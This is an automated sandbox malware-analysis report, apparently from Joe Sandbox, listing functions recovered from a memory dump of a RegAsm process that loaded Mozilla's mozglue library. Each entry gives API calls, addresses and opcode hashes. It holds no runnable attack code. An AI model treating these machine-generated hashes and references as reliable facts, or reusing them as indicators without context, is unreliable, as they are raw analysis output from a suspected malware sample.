                                                                                    • Opcode ID: b553bb855293fbd28bb1d51aa6bbe2e8d8120c3f76e0635737e0bcdc71728e34
                                                                                    • Instruction ID: 98c5dc5529148ac1fbcc1a9944702433443213538894e013168e2c09d68a301a
                                                                                    • Opcode Fuzzy Hash: b553bb855293fbd28bb1d51aa6bbe2e8d8120c3f76e0635737e0bcdc71728e34
                                                                                    • Instruction Fuzzy Hash: 6481D070A15205DFCB08CF68D8849EEBBB2FF89324F05462DE815AB750D770E844CBA6
                                                                                    APIs
                                                                                    • GetTickCount64.KERNEL32 ref: 6C6E5D40
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E5D67
                                                                                    • __aulldiv.LIBCMT ref: 6C6E5DB4
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6E5DED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 557828605-0
                                                                                    • Opcode ID: c3c37be68ecc293cbdecb8f7a5dc84705a6f9b08db7391c6e245e551a8e8e497
                                                                                    • Instruction ID: 0232fe880aeaa34ddf9665a33668bda5eb156205a6870b18acc88820bb8b937d
                                                                                    • Opcode Fuzzy Hash: c3c37be68ecc293cbdecb8f7a5dc84705a6f9b08db7391c6e245e551a8e8e497
                                                                                    • Instruction Fuzzy Hash: A4518171E051298FCF08DF68C854ABEBBF2FB89318F29862EC815A7750C7306945CB95
                                                                                    APIs
                                                                                    • GetTickCount64.KERNEL32 ref: 6C727250
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C727277
                                                                                    • __aulldiv.LIBCMT ref: 6C7272C4
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C7272F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 557828605-0
                                                                                    • Opcode ID: bafe37c99ee1ce7aaeee6419be27a95a1806fc1a06a4bb7504e3c8ead33cd654
                                                                                    • Instruction ID: 64524f588953639e66abd11277133d1580b6c216cc9afeeef6e72a9d022c4a0d
                                                                                    • Opcode Fuzzy Hash: bafe37c99ee1ce7aaeee6419be27a95a1806fc1a06a4bb7504e3c8ead33cd654
                                                                                    • Instruction Fuzzy Hash: A4519F71E011298FCF08DFA8CA94ABEBBB1FB89308F15C62AD815A7751C7346D45CB91
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CCEBD
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C6CCEF5
                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C6CCF4E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 438689982-4108050209
                                                                                    • Opcode ID: 11144fd202b18ea6348056dbb26b671d2ecee72f68b3c14f70122ad2fa3c7207
                                                                                    • Instruction ID: c75ebe45896f14fd9bb33fcbd6b8e8cf6c43e0438abedb15511491804cd64319
                                                                                    • Opcode Fuzzy Hash: 11144fd202b18ea6348056dbb26b671d2ecee72f68b3c14f70122ad2fa3c7207
                                                                                    • Instruction Fuzzy Hash: 39511575A0026A8FCB00CF18C890A9AFBB5EF99304F19859DD85A5F352D731ED06CBE1
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7277FA
                                                                                    • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C727829
                                                                                      • Part of subcall function 6C6FCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C6C31A7), ref: 6C6FCC45
                                                                                      • Part of subcall function 6C6FCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C6C31A7), ref: 6C6FCC4E
                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C72789F
                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7278CF
                                                                                      • Part of subcall function 6C6C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6C4E5A
                                                                                      • Part of subcall function 6C6C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6C4E97
                                                                                      • Part of subcall function 6C6C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C703EBD,6C703EBD,00000000), ref: 6C6C42A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                    • String ID:
                                                                                    • API String ID: 2525797420-0
                                                                                    • Opcode ID: b944f211e1100f55f1cfaaead0eebc694a27b781e0d5452bdd76daa10bf90571
                                                                                    • Instruction ID: e27dca255317756e80a28f28f96097619ab8f7a7e2ce2d0c84e6430f97460c06
                                                                                    • Opcode Fuzzy Hash: b944f211e1100f55f1cfaaead0eebc694a27b781e0d5452bdd76daa10bf90571
                                                                                    • Instruction Fuzzy Hash: AA41AC719047069BD300DF29C48056AFBF4FFCA268F204A2EE4A987641DB71E55ACBD6
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C7082BC,?,?), ref: 6C70649B
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7064A9
                                                                                      • Part of subcall function 6C6FFA80: GetCurrentThreadId.KERNEL32 ref: 6C6FFA8D
                                                                                      • Part of subcall function 6C6FFA80: AcquireSRWLockExclusive.KERNEL32(6C74F448), ref: 6C6FFA99
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C70653F
                                                                                    • free.MOZGLUE(?), ref: 6C70655A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3596744550-0
                                                                                    • Opcode ID: 52a7eb2bf39428960083fcd5e2b8e60d51470de87b1407aa166281720b464830
                                                                                    • Instruction ID: 1e077e6f7c6606f41f2bf2dc37d7bce1a73c65009d9ba5aaeed6b9a49e1f986e
                                                                                    • Opcode Fuzzy Hash: 52a7eb2bf39428960083fcd5e2b8e60d51470de87b1407aa166281720b464830
                                                                                    • Instruction Fuzzy Hash: 113181B5A043159FC700CF14D994A9AB7E4BF89314F40842EE85A87741EB30EA19CB96
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C71D019,?,?,?,?,?,00000000,?,6C70DA31,00100000,?), ref: 6C6FFFD3
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,6C71D019,?,?,?,?,?,00000000,?,6C70DA31,00100000,?,?), ref: 6C6FFFF5
                                                                                    • free.MOZGLUE(?,?,?,?,?,6C71D019,?,?,?,?,?,00000000,?,6C70DA31,00100000,?), ref: 6C70001B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C71D019,?,?,?,?,?,00000000,?,6C70DA31,00100000,?,?), ref: 6C70002A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 826125452-0
                                                                                    • Opcode ID: b50f01632a95564f50b15b1833aedc707f57c8aa2578a1b1b8be2aeed9b0c5ab
                                                                                    • Instruction ID: 1613443028812e8aed2824272e022a785359cd08a6eed25e799e7e9fe17d819a
                                                                                    • Opcode Fuzzy Hash: b50f01632a95564f50b15b1833aedc707f57c8aa2578a1b1b8be2aeed9b0c5ab
                                                                                    • Instruction Fuzzy Hash: 2F21D6B2B002155BD7089E78DC948AFB7FAFB853247250738E425D7780EB70AD0287D6
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6DB4F5
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C6DB502
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C6DB542
                                                                                    • free.MOZGLUE(?), ref: 6C6DB578
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: b857804f592755bc155852f9b508ffbebedc920e1d17f24650cb3c4ae46d4def
                                                                                    • Instruction ID: a95bac96e151be3274201b163910ff92d3a4bf9a5dfb3df8f3dd4d3f0b049cb8
                                                                                    • Opcode Fuzzy Hash: b857804f592755bc155852f9b508ffbebedc920e1d17f24650cb3c4ae46d4def
                                                                                    • Instruction Fuzzy Hash: 79112130A14B00C7D3128F29C4007A5B3B0FFDA328F11932BE85953B01EBB0B5C18788
                                                                                    APIs
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C6CF20E,?), ref: 6C703DF5
                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C6CF20E,00000000,?), ref: 6C703DFC
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C703E06
                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C703E0E
                                                                                      • Part of subcall function 6C6FCC00: GetCurrentProcess.KERNEL32(?,?,6C6C31A7), ref: 6C6FCC0D
                                                                                      • Part of subcall function 6C6FCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6C31A7), ref: 6C6FCC16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                    • String ID:
                                                                                    • API String ID: 2787204188-0
                                                                                    • Opcode ID: 16a7d78c2fad6bbafbac29987910dbdbe4f9c458cdecd3b0f36bddc291481742
                                                                                    • Instruction ID: 2c949a29ab500e64de22949404c45d985e6d7d4089d8cd6be2e77894a2e16154
                                                                                    • Opcode Fuzzy Hash: 16a7d78c2fad6bbafbac29987910dbdbe4f9c458cdecd3b0f36bddc291481742
                                                                                    • Instruction Fuzzy Hash: DAF08CB1A002087BEB00AB54EC85DAB376DEB46629F044031FE0C57701D735BE2986FB
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71205B
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C71201B,?,?,?,?,?,?,?,6C711F8F,?,?), ref: 6C712064
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71208E
                                                                                    • free.MOZGLUE(?,?,?,00000000,?,6C71201B,?,?,?,?,?,?,?,6C711F8F,?,?), ref: 6C7120A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: e490187a111792a881057dbf382efb730dc04bc49e188a0eed01b71254c66cad
                                                                                    • Instruction ID: b467efa56b054c2a3e6237b8be93c161183ff0f7b19c624c41cb7986e3078006
                                                                                    • Opcode Fuzzy Hash: e490187a111792a881057dbf382efb730dc04bc49e188a0eed01b71254c66cad
                                                                                    • Instruction Fuzzy Hash: 01F0B471104A109FC7119F16D888B5BB7F8EF8B368F14012AE50687B10DB71B806CB95
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7120B7
                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C6FFBD1), ref: 6C7120C0
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C6FFBD1), ref: 6C7120DA
                                                                                    • free.MOZGLUE(00000000,?,6C6FFBD1), ref: 6C7120F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: cb26be335fe928832b9619893bb848bf00c6fac36a9a131397315fa1166be13f
                                                                                    • Instruction ID: 3c591dc8ee583bdbcf4b7a011f90db115b5d7b6d94853d26f6fc21b3639e8202
                                                                                    • Opcode Fuzzy Hash: cb26be335fe928832b9619893bb848bf00c6fac36a9a131397315fa1166be13f
                                                                                    • Instruction Fuzzy Hash: AEE06531605A249BC720AF25980894EB7FDEF87318B14463BE54693F00E776B9468AD9
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7185D3
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C718725
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 3720097785-1285458680
                                                                                    • Opcode ID: a1e76f64790d06eb4e73e8f90e00f25cb67dab65272240c1ef65ff2c57f66409
                                                                                    • Instruction ID: 6098090ef59be923c4a729ae86976de820256c284c1453cd8cba70ea4699824c
                                                                                    • Opcode Fuzzy Hash: a1e76f64790d06eb4e73e8f90e00f25cb67dab65272240c1ef65ff2c57f66409
                                                                                    • Instruction Fuzzy Hash: 3F517874A08651CFD701CF28C288B55BBF1BF4A318F1AC29AD8595BB52C335E845CF92
                                                                                    APIs
                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C6CBDEB
                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CBE8F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                    • String ID: 0
                                                                                    • API String ID: 2811501404-4108050209
                                                                                    • Opcode ID: 32b1761a71f7a69684ec118a11e01defcfddba6b104869c31f16554a6003c5bf
                                                                                    • Instruction ID: 023302ac7d104dc502bb366abe5ffd27f0d1ad2bb040a004020bae07ff1e30f2
                                                                                    • Opcode Fuzzy Hash: 32b1761a71f7a69684ec118a11e01defcfddba6b104869c31f16554a6003c5bf
                                                                                    • Instruction Fuzzy Hash: 58418E71A09745CFC701DF38D481A9BB7E4EFCA388F008A1DF995A7611D731A9498B8B
                                                                                    APIs
                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C703D19
                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C703D6C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errnomozalloc_abort
                                                                                    • String ID: d
                                                                                    • API String ID: 3471241338-2564639436
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6D44B2,6C74E21C,6C74F7F8), ref: 6C6D473E
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C6D474A
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetNtLoaderAPI
                                                                                    • API String ID: 1646373207-1628273567
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C726E22
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C726E3F
                                                                                    Strings
                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C726E1D
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footergetenv
                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                    • API String ID: 1472356752-1153589363
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D9EEF
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: Infinity$NaN
                                                                                    • API String ID: 1385522511-4285296124
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(0Kpl,?,6C704B30,80000000,?,6C704AB7,?,6C6C43CF,?,6C6C42D2), ref: 6C6D6C42
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • moz_xmalloc.MOZGLUE(0Kpl,?,6C704B30,80000000,?,6C704AB7,?,6C6C43CF,?,6C6C42D2), ref: 6C6D6C58
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$malloc
                                                                                    • String ID: 0Kpl
                                                                                    • API String ID: 1967447596-3332051225
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C7451C8), ref: 6C72591A
                                                                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C72592B
                                                                                    Strings
                                                                                    • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C725915
                                                                                    Similarity
                                                                                    • API ID: CloseEnvironmentHandleVariable
                                                                                    • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                    • API String ID: 297244470-335682676
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F860), ref: 6C6D385C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F860,?), ref: 6C6D3871
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                    • String ID: ,tl
                                                                                    • API String ID: 17069307-3974665966
                                                                                    APIs
                                                                                    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C6DBEE3
                                                                                    • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C6DBEF5
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Library$CallsDisableLoadThread
                                                                                    • String ID: cryptbase.dll
                                                                                    • API String ID: 4137859361-1262567842
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6C4E9C,?,?,?,?,?), ref: 6C6C510A
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6C4E9C,?,?,?,?,?), ref: 6C6C5167
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C6C5196
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6C4E9C), ref: 6C6C5234
                                                                                    Similarity
                                                                                    • API ID: memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3510742995-0
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C700918
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C7009A6
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC,?,00000000), ref: 6C7009F3
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C700ACB
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3168844106-0
                                                                                    APIs
                                                                                    • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C6FE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C725A47
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C6FE56A,?,|UrlbarCSSSpan), ref: 6C725A5C
